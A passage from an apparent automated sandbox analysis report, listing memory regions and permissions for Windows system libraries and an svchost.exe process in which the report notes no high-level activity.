| counters.dat | 0x61d310000 | 0x61d310fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x000000061d320000 | 0x61d320000 | 0x61d324fff | Private Memory | rw |
|
|
|
- |
| tdh.dll.mui | 0x61d330000 | 0x61d34afff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000061d350000 | 0x61d350000 | 0x61d350fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000061d360000 | 0x61d360000 | 0x61d45ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000061d470000 | 0x61d470000 | 0x61d56ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000061d760000 | 0x61d760000 | 0x61d8e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000061d8f0000 | 0x61d8f0000 | 0x61da70fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000061da80000 | 0x61da80000 | 0x61db3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x61db40000 | 0x61de76fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000061de80000 | 0x61de80000 | 0x61df7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000061df80000 | 0x61df80000 | 0x61e07ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000061e080000 | 0x61e080000 | 0x61e17ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000061e180000 | 0x61e180000 | 0x61e27ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000061e280000 | 0x61e280000 | 0x61e37ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000061e380000 | 0x61e380000 | 0x61e47ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000061e480000 | 0x61e480000 | 0x61e57ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000061e580000 | 0x61e580000 | 0x61e77ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000061e780000 | 0x61e780000 | 0x61e87ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000061e880000 | 0x61e880000 | 0x61e97ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000061e980000 | 0x61e980000 | 0x61ea8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000061ea90000 | 0x61ea90000 | 0x61ec95fff | Private Memory | rw |
|
|
|
- |
| private_0x000000061eca0000 | 0x61eca0000 | 0x61ed9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000061eda0000 | 0x61eda0000 | 0x61ee9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000061eea0000 | 0x61eea0000 | 0x61eea0fff | Pagefile Backed Memory | r |
|
|
|
- |
| msxml6r.dll | 0x61eeb0000 | 0x61eeb0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000061eec0000 | 0x61eec0000 | 0x61eec6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000061eed0000 | 0x61eed0000 | 0x61eed0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000061eee0000 | 0x61eee0000 | 0x61eee0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000061eef0000 | 0x61eef0000 | 0x61eefffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x61ef00000 | 0x61efdefff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000061efe0000 | 0x61efe0000 | 0x61f0dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000061f0e0000 | 0x61f0e0000 | 0x61f2dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000061f2e0000 | 0x61f2e0000 | 0x61f2e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000061f2f0000 | 0x61f2f0000 | 0x61f2f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000061f300000 | 0x61f300000 | 0x61f300fff | Pagefile Backed Memory | r |
|
|
|
- |
| winnlsres.dll | 0x61f310000 | 0x61f314fff | Memory Mapped File | r |
|
|
|
- |
| winnlsres.dll.mui | 0x61f320000 | 0x61f32ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000061f330000 | 0x61f330000 | 0x61f330fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000061f340000 | 0x61f340000 | 0x61f340fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000061f350000 | 0x61f350000 | 0x61f44ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000061f450000 | 0x61f450000 | 0x61f450fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000061f460000 | 0x61f460000 | 0x61f85ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000061f860000 | 0x61f860000 | 0x61f860fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000061f870000 | 0x61f870000 | 0x61f870fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000061f880000 | 0x61f880000 | 0x61f97ffff | Private Memory | rw |
|
|
|
- |
| mswsock.dll.mui | 0x61f980000 | 0x61f982fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000061fa90000 | 0x61fa90000 | 0x61fb8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000061fd90000 | 0x61fd90000 | 0x61fe8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000061fe90000 | 0x61fe90000 | 0x61ff8ffff | Private Memory | rw |
|
|
|
- |
| crypt32.dll.mui | 0x61ff90000 | 0x61ff99fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000006201a0000 | 0x6201a0000 | 0x62029ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000006202a0000 | 0x6202a0000 | 0x62069ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000006206a0000 | 0x6206a0000 | 0x620e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000620ea0000 | 0x620ea0000 | 0x621e6ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000006225a0000 | 0x6225a0000 | 0x62356ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000623d80000 | 0x623d80000 | 0x624d4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5fffd0000 | 0x7df5fffd0000 | 0x7ff5fffcffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff7cbf6e000 | 0x7ff7cbf6e000 | 0x7ff7cbf6ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cbf70000 | 0x7ff7cbf70000 | 0x7ff7cbf71fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cbf72000 | 0x7ff7cbf72000 | 0x7ff7cbf73fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cbf78000 | 0x7ff7cbf78000 | 0x7ff7cbf79fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cbf7c000 | 0x7ff7cbf7c000 | 0x7ff7cbf7dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cbf7e000 | 0x7ff7cbf7e000 | 0x7ff7cbf7ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cbf80000 | 0x7ff7cbf80000 | 0x7ff7cbf81fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cbf82000 | 0x7ff7cbf82000 | 0x7ff7cbf83fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cbf84000 | 0x7ff7cbf84000 | 0x7ff7cbf85fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cbf86000 | 0x7ff7cbf86000 | 0x7ff7cbf87fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cbf88000 | 0x7ff7cbf88000 | 0x7ff7cbf89fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cbf8a000 | 0x7ff7cbf8a000 | 0x7ff7cbf8bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cbf8c000 | 0x7ff7cbf8c000 | 0x7ff7cbf8dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cbf8e000 | 0x7ff7cbf8e000 | 0x7ff7cbf8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff7cbf90000 | 0x7ff7cbf90000 | 0x7ff7cc08ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff7cc090000 | 0x7ff7cc090000 | 0x7ff7cc0b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff7cc0b4000 | 0x7ff7cc0b4000 | 0x7ff7cc0b5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cc0bc000 | 0x7ff7cc0bc000 | 0x7ff7cc0bcfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cc0be000 | 0x7ff7cc0be000 | 0x7ff7cc0bffff | Private Memory | rw |
|
|
|
- |
| officeclicktorun.exe | 0x7ff7cc5d0000 | 0x7ff7cce2bfff | Memory Mapped File | rwx |
|
|
|
- |
| mskeyprotect.dll | 0x7ffae9750000 | 0x7ffae9763fff | Memory Mapped File | rwx |
|
|
|
- |
| ncryptsslp.dll | 0x7ffae9800000 | 0x7ffae981efff | Memory Mapped File | rwx |
|
|
|
- |
| appvfilesystemmetadata.dll | 0x7ffae9820000 | 0x7ffae986cfff | Memory Mapped File | rwx |
|
|
|
- |
| appvisvsubsystemcontroller.dll | 0x7ffae9870000 | 0x7ffae99f5fff | Memory Mapped File | rwx |
|
|
|
- |
| appvintegration.dll | 0x7ffae9a00000 | 0x7ffae9c30fff | Memory Mapped File | rwx |
|
|
|
- |
| appvisvvirtualization.dll | 0x7ffae9c40000 | 0x7ffae9cd7fff | Memory Mapped File | rwx |
|
|
|
- |
| appvcatalog.dll | 0x7ffae9ce0000 | 0x7ffae9d89fff | Memory Mapped File | rwx |
|
|
|
- |
| appvmanifest.dll | 0x7ffae9e60000 | 0x7ffae9f91fff | Memory Mapped File | rwx |
|
|
|
- |
| appvisvstreamingmanager.dll | 0x7ffaea060000 | 0x7ffaea096fff | Memory Mapped File | rwx |
|
|
|
- |
| webio.dll | 0x7ffaea0a0000 | 0x7ffaea11ffff | Memory Mapped File | rwx |
|
|
|
- |
| appvorchestration.dll | 0x7ffaea160000 | 0x7ffaea24ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr120.dll | 0x7ffaea250000 | 0x7ffaea33efff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp120.dll | 0x7ffaea340000 | 0x7ffaea3e5fff | Memory Mapped File | rwx |
|
|
|
- |
| appvpolicy.dll | 0x7ffaea3f0000 | 0x7ffaea530fff | Memory Mapped File | rwx |
|
|
|
- |
| appvisvapi.dll | 0x7ffaea540000 | 0x7ffaea5bbfff | Memory Mapped File | rwx |
|
|
|
- |
| msxml6.dll | 0x7ffaea5e0000 | 0x7ffaea856fff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x7ffaea860000 | 0x7ffaea876fff | Memory Mapped File | rwx |
|
|
|
- |
| msdelta.dll | 0x7ffaea9f0000 | 0x7ffaeaa71fff | Memory Mapped File | rwx |
|
|
|
- |
| streamserver.dll | 0x7ffaeaa80000 | 0x7ffaeae67fff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7ffaeb520000 | 0x7ffaeb52dfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ffaeb6f0000 | 0x7ffaeb6f9fff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x7ffaeb700000 | 0x7ffaeb9a6fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x7ffaeb9b0000 | 0x7ffaebb46fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x7ffaebb50000 | 0x7ffaebb5bfff | Memory Mapped File | rwx |
|
|
|
- |
| ondemandconnroutehelper.dll | 0x7ffaebc80000 | 0x7ffaebc94fff | Memory Mapped File | rwx |
|
|
|
- |
| msi.dll | 0x7ffaebd70000 | 0x7ffaec0acfff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x7ffaec140000 | 0x7ffaec17efff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x7ffaec410000 | 0x7ffaec419fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ffaecc30000 | 0x7ffaecea3fff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7ffaedb10000 | 0x7ffaede85fff | Memory Mapped File | rwx |
|
|
|
- |
| rstrtmgr.dll | 0x7ffaef3a0000 | 0x7ffaef3d1fff | Memory Mapped File | rwx |
|
|
|
- |
| apiclient.dll | 0x7ffaef3e0000 | 0x7ffaef419fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp140.dll | 0x7ffaef420000 | 0x7ffaef4befff | Memory Mapped File | rwx |
|
|
|
- |
| vcruntime140.dll | 0x7ffaef4c0000 | 0x7ffaef4d5fff | Memory Mapped File | rwx |
|
|
|
- |
| cabinet.dll | 0x7ffaef4e0000 | 0x7ffaef506fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7ffaef620000 | 0x7ffaef6f5fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ffaef9c0000 | 0x7ffaef9f5fff | Memory Mapped File | rwx |
|
|
|
- |
| ucrtbase.dll | 0x7ffaf02c0000 | 0x7ffaf03b1fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7ffaf07f0000 | 0x7ffaf0809fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x7ffaf0810000 | 0x7ffaf0825fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x7ffaf0920000 | 0x7ffaf0987fff | Memory Mapped File | rwx |
|
|
|
- |
| samcli.dll | 0x7ffaf0f60000 | 0x7ffaf0f77fff | Memory Mapped File | rwx |
|
|
|
- |
| wkscli.dll | 0x7ffaf1380000 | 0x7ffaf1395fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ffaf1940000 | 0x7ffaf194afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ffaf1960000 | 0x7ffaf1997fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ffaf2a00000 | 0x7ffaf2a12fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ffaf3360000 | 0x7ffaf3382fff | Memory Mapped File | rwx |
|
|
|
- |
| tdh.dll | 0x7ffaf3390000 | 0x7ffaf3487fff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ffaf35e0000 | 0x7ffaf3637fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ffaf36f0000 | 0x7ffaf36fbfff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7ffaf3700000 | 0x7ffaf3725fff | Memory Mapped File | rwx |
|
|
|
- |
| schannel.dll | 0x7ffaf3840000 | 0x7ffaf38b3fff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x7ffaf38c0000 | 0x7ffaf38c9fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 42 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #52: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #52 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k appmodel |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5e0 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePermanentPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege |
| Thread IDs |
0x
B1C
0x
A04
0x
6C8
0x
5E4
0x
548
0x
8EC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000f398940000 | 0xf398940000 | 0xf39894ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0xf398950000 | 0xf398950fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000f398960000 | 0xf398960000 | 0xf398973fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f398980000 | 0xf398980000 | 0xf3989fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f398a00000 | 0xf398a00000 | 0xf398a03fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000f398a10000 | 0xf398a10000 | 0xf398a10fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f398a20000 | 0xf398a20000 | 0xf398a21fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xf398a30000 | 0xf398aedfff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf398af0000 | 0xf398afffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf398b00000 | 0xf398b0ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf398b10000 | 0xf398b1ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf398b20000 | 0xf398b2ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf398b30000 | 0xf398b3ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf398b40000 | 0xf398b4ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f398b70000 | 0xf398b70000 | 0xf398b70fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f398b80000 | 0xf398b80000 | 0xf398b80fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f398b90000 | 0xf398b90000 | 0xf398b90fff | Pagefile Backed Memory | r |
|
|
|
- |
| vedatamodel.edb | 0xf398ba0000 | 0xf398baffff | Memory Mapped File | r |
|
|
|
- |
| staterepository-machine.srd-shm | 0xf398bb0000 | 0xf398bb7fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x000000f398bc0000 | 0xf398bc0000 | 0xf398bc0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000f398bd0000 | 0xf398bd0000 | 0xf398bd0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f398be0000 | 0xf398be0000 | 0xf398be0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f398bf0000 | 0xf398bf0000 | 0xf398bf6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f398c00000 | 0xf398c00000 | 0xf398cfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f398d00000 | 0xf398d00000 | 0xf398e87fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f398e90000 | 0xf398e90000 | 0xf398e90fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f398ea0000 | 0xf398ea0000 | 0xf398ea0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f398eb0000 | 0xf398eb0000 | 0xf398eb0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f398ec0000 | 0xf398ec0000 | 0xf398ec6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f398ed0000 | 0xf398ed0000 | 0xf398ed3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f398ee0000 | 0xf398ee0000 | 0xf398ee1fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f398ef0000 | 0xf398ef0000 | 0xf398ef0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f398f00000 | 0xf398f00000 | 0xf398ffffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f399000000 | 0xf399000000 | 0xf399180fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000f399190000 | 0xf399190000 | 0xf39924ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f399350000 | 0xf399350000 | 0xf39944ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xf399450000 | 0xf399786fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f399990000 | 0xf399990000 | 0xf399a8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f399b90000 | 0xf399b90000 | 0xf399b9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000f399ba0000 | 0xf399ba0000 | 0xf399baffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000f399bb0000 | 0xf399bb0000 | 0xf399bbffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000f399bc0000 | 0xf399bc0000 | 0xf399bcffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000f399bd0000 | 0xf399bd0000 | 0xf399bdffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000f399be0000 | 0xf399be0000 | 0xf399beffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000f399bf0000 | 0xf399bf0000 | 0xf399bfffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000f399c00000 | 0xf399c00000 | 0xf399c0ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000f399c10000 | 0xf399c10000 | 0xf39ac0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f39ac10000 | 0xf39ac10000 | 0xf39ac2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f39ac30000 | 0xf39ac30000 | 0xf3aac2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f3aac30000 | 0xf3aac30000 | 0xf3bac2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f3bac30000 | 0xf3bac30000 | 0xf3bac30fff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0xf3bac40000 | 0xf3bac4ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bac50000 | 0xf3bac5ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bac60000 | 0xf3bac6ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bac70000 | 0xf3bac7ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bace0000 | 0xf3baceffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bacf0000 | 0xf3bacfffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bad00000 | 0xf3bad0ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bad10000 | 0xf3bad1ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bad20000 | 0xf3bad2ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f3bad30000 | 0xf3bad30000 | 0xf3badaffff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0xf3badb0000 | 0xf3badbffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f3badc0000 | 0xf3badc0000 | 0xf3badc0fff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0xf3badd0000 | 0xf3baddffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bade0000 | 0xf3badeffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3badf0000 | 0xf3badfffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bae00000 | 0xf3bae0ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bae10000 | 0xf3bae1ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bae20000 | 0xf3bae2ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bae30000 | 0xf3bae3ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bae40000 | 0xf3bae4ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bae50000 | 0xf3bae5ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bae60000 | 0xf3bae6ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bae70000 | 0xf3bae7ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bae80000 | 0xf3bae8ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bae90000 | 0xf3bae9ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3baea0000 | 0xf3baeaffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3baeb0000 | 0xf3baebffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3baec0000 | 0xf3baecffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3baed0000 | 0xf3baedffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3baee0000 | 0xf3baeeffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3baef0000 | 0xf3baefffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3baf00000 | 0xf3baf0ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3baf10000 | 0xf3baf1ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3baf20000 | 0xf3baf2ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3baf30000 | 0xf3baf3ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3baf40000 | 0xf3baf4ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3baf50000 | 0xf3baf5ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3baf60000 | 0xf3baf6ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3baf70000 | 0xf3baf7ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3baf80000 | 0xf3baf8ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000f3baf90000 | 0xf3baf90000 | 0xf3bafb9fff | Pagefile Backed Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0xf3bafc0000 | 0xf3bafcffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bafd0000 | 0xf3bafdffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bafe0000 | 0xf3bafeffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3baff0000 | 0xf3baffffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f3bb300000 | 0xf3bb300000 | 0xf3bb3fffff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0xf3bb400000 | 0xf3bb40ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb410000 | 0xf3bb41ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb420000 | 0xf3bb42ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb430000 | 0xf3bb43ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb440000 | 0xf3bb44ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb450000 | 0xf3bb45ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb460000 | 0xf3bb46ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb470000 | 0xf3bb47ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb480000 | 0xf3bb48ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb490000 | 0xf3bb49ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb4a0000 | 0xf3bb4affff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb4b0000 | 0xf3bb4bffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb4c0000 | 0xf3bb4cffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb4d0000 | 0xf3bb4dffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb4e0000 | 0xf3bb4effff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000f3bb4f0000 | 0xf3bb4f0000 | 0xf3bb4f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f3bb500000 | 0xf3bb500000 | 0xf3bb5fffff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0xf3bb600000 | 0xf3bb60ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb610000 | 0xf3bb61ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb620000 | 0xf3bb62ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb630000 | 0xf3bb63ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb640000 | 0xf3bb64ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb650000 | 0xf3bb65ffff | Memory Mapped File | r |
|
|
|
- |
